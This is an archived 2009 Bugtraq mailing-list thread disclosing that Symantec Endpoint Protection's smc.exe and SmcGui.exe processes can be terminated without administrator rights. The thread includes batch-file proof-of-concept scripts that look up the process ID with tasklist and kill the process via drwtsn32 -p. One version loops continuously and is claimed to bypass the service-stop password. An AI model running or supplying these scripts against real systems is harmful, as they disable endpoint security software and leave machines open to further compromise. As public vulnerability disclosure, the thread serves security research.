lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Fri, 13 Feb 2009 20:06:24 +0530 From: "Sandeep Cheema" <51l3n7@...e.in> To: <bugtraq@...urityfocus.com> Subject: Re: SEPKILL /im SMC.EXE /f For the "users" its working for SmcGUI.exe Please find the code as below. :here tasklist | find /i "SmcGui.exe" > c:\pid.txt FOR /F "tokens=2" %%R IN ('TYPE "c:\pid.txt"') DO SET pidopt=%%R drwtsn32 -p %pidopt% goto :here I have tried it and when let this file run for around 2 mins, The SmcGui.exe process loads up when you logoff and log back in (or restart)but the icon does not show up in the taskbar. Thank you. Regards, Sandeep -------------------------------------------------- From: "Sandeep Cheema" <51l3n7@...e.in> Sent: Friday, February 13, 2009 7:03 PM To: <bugtraq@...urityfocus.com> Subject: Re: SEPKILL /im SMC.EXE /f > As an update its not happening for "Users" account, Though no access > denied. > > Anyone knows why? > > Thank you. > > Regards, Sandeep > > -------------------------------------------------- > From: "Sandeep Cheema" <51l3n7@...e.in> > Sent: Friday, February 13, 2009 6:18 PM > To: <bugtraq@...urityfocus.com> > Subject: SEPKILL /im SMC.EXE /f > >> Hi, >> >> Probably this bug exists on majorly all the software's but security >> software's like antivirus and firewall have to bucket it which is not >> what its for SEP. >> I have tested it on all versions of SEP from 11.0.776 to 11.0.4000(XP and >> 2k3) >> >> >> You can kill smc.exe with the help of drwtsn32.exe in the following way. >> >> drwtsn32 -p %pid% >> where pid is the process id for smc.exe >> >> POC: >> >> Save the following as a batch file and execute it >> >> tasklist | find /i "Smc.exe" > c:\pid.txt >> FOR /F "tokens=2" %%R IN ('TYPE "c:\pid.txt"') DO SET pidopt=%%R >> drwtsn32 -p %pidopt% >> >> >> >> You don't need admin privilege for this exploit. >> >> This will even bypass the password if it has been set to stop the >> service. >> If executed from the command line in the form drwtsn32 -p %pid% , the >> command will be executed and it takes some time for the process to be >> stopped. >> If done from a batch file the command is completed only when the process >> is stopped. >> >> Regards, Sandeep >> 51l3n7[at]live.in >> >> >>
Powered by blists - more mailing lists